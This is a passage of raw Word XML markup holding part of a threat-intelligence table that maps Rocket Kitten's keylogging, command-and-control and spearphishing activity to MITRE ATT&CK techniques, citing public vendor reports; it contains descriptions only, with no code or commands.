        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06751E99" w14:textId="40CC5AB2" w:rsidR="00775D24" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Input Capture : Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56238FC0" w14:textId="7AC040E4" w:rsidR="00775D24" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D4E8D1F" w14:textId="77777777" w:rsidR="00775D24" w:rsidRPr="00EF728A" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3988A5F8" w14:textId="3C86700D" w:rsidR="00775D24" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A53EE6A" w14:textId="2A83CB8E" w:rsidR="00775D24" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10EE31C0" w14:textId="785BDEFE" w:rsidR="00775D24" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE6522">
              <w:t>an unsophisticated key-logger apparently named ‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE6522">
              <w:t>woolger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE6522" w:rsidRPr="00601A8D" w14:paraId="741C11CC" w14:textId="77777777" w:rsidTr="00EC371F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51084C16" w14:textId="02FB7424" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="465BD2D7" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0011 Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB45CB2" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1095 Non-Application Layer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6154E34A" w14:textId="28F21E47" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A08ACB" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79F9395A" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="691A26F5" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B55692F" w14:textId="19F5A997" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[1] Send keylogger details</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFE9161" w14:textId="55B8C4C9" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE6522" w:rsidRPr="00EF728A" w14:paraId="1B7EB95C" w14:textId="77777777" w:rsidTr="00EC371F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E566472" w14:textId="49C9EC10" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13584E58" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0009 Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DC25325" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Input Capture : Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62FC8FBA" w14:textId="6C698619" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E22B1E2" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="640EE060" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29C2A256" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ADA8074" w14:textId="5F3B78E4" w:rsidR="00DE6522" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:r>
              <w:t>[1] Example of multiple runs. A</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE6522">
              <w:t>n unsophisticated key-logger apparently named ‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE6522">
              <w:t>woolger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE6522" w:rsidRPr="00601A8D" w14:paraId="24A91AFA" w14:textId="77777777" w:rsidTr="00EC371F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6799C261" w14:textId="172C5459" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10C2F9C7" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0011 Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22F50868" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1095 Non-Application Layer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5051B4" w14:textId="693BEA22" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D5B2AA6" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D800E5A" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B369D7" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F01A1A" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[1] Send keylogger details</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43260560" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00601A8D" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="27"/>
      <w:tr w:rsidR="008F437F" w:rsidRPr="00EF728A" w14:paraId="5458780D" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D4E7F9D" w14:textId="77777777" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17824F81" w14:textId="77777777" w:rsidR="008F437F" w:rsidRDefault="008F437F" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D30B471" w14:textId="77777777" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5087562D" w14:textId="77777777" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7301D163" w14:textId="77777777" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27CAC963" w14:textId="77777777" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="299CAFB6" w14:textId="77777777" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B0D9D4C" w14:textId="77777777" w:rsidR="008F437F" w:rsidRDefault="008F437F" w:rsidP="00EC371F"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02976736" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="0077286F" w:rsidRDefault="0069253B" w:rsidP="00005982"/>
    <w:p w14:paraId="1620F2C0" w14:textId="28F97F76" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="005E720A" w:rsidRPr="005E720A">
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:hyperlink r:id="rId16" w:history="1">
          <w:r w:rsidR="005E720A">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:t>rocket-kitten-report.pdf (checkpoint.com)</w:t>
          </w:r>
        </w:hyperlink>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2015]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B9A7A" w14:textId="5AFE3EC9" w:rsidR="00C67A35" w:rsidRDefault="00C67A35" w:rsidP="00005982">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>The Spy Kittens Are Back: Rocket Kitten 2 (trendmicro.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2015]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BB9543" w14:textId="72FC9490" w:rsidR="00EE4FB3" w:rsidRDefault="00EE4FB3" w:rsidP="00005982">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>fireeye_iran.pdf (regmedia.co.uk)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  [2014]   - Actually the ATT&amp;CK link goes to a k3echang report so this is the corrected link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02449EC7" w14:textId="28EC5693" w:rsidR="009D7EBD" w:rsidRDefault="009D7EBD" w:rsidP="00005982">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60876568" w14:textId="5FFDCD1B" w:rsidR="009D7EBD" w:rsidRDefault="009D7EBD" w:rsidP="00005982">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A34CEE" w14:textId="77777777" w:rsidR="00830893" w:rsidRDefault="007662B8" w:rsidP="00005982">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="005761AD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>p7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClearSky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> provided many examples of personalized phishing e-mails and communication, including phone calls to victims luring them to open these attachments, demonstrating the group’s persistency and breadth of operations  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBEE60" w14:textId="77777777" w:rsidR="00830893" w:rsidRDefault="00830893" w:rsidP="00005982">
      <w:r>
        <w:t xml:space="preserve">[1] Actual malicious attachments detected in this campaign varied between a set of custom-written malware pieces, or ‘downloader’ components that, in turn, fetch the malware from a remote server and execute in on the victim machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656BFC5" w14:textId="6D24C36C" w:rsidR="009D7EBD" w:rsidRDefault="007662B8" w:rsidP="00005982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment, T1204.002 : User Execution : Malicious File )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669EB50" w14:textId="76A7342C" w:rsidR="00830893" w:rsidRDefault="00830893" w:rsidP="00005982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>[1]p9</w:t>
      </w:r>
    </w:p>
